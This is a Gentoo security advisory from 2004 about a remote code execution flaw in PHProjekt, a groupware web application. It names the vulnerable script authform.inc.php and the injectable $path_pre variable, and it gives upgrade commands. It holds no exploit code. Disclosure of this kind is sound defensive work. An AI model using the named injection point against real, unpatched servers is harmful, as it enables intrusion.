PHProjekt: Remote code execution vulnerability

2004-12-30T00:00:00
ID GLSA-200412-27
Type gentoo
Reporter Gentoo Foundation
Modified 2004-12-30T00:00:00

Description

Background

PHProjekt is a modular groupware web application used to coordinate group activities and share files.

Description

cYon discovered that the authform.inc.php script allows a remote user to define the global variable $path_pre.

Impact

A remote attacker can exploit this vulnerability to force authform.inc.php to download and execute arbitrary PHP code with the privileges of the web server user.

Workaround

There is no known workaround at this time.

Resolution

All PHProjekt users should upgrade to the latest version:

 # emerge --sync
 # emerge --ask --oneshot --verbose ">=www-apps/phprojekt-4.2-r2"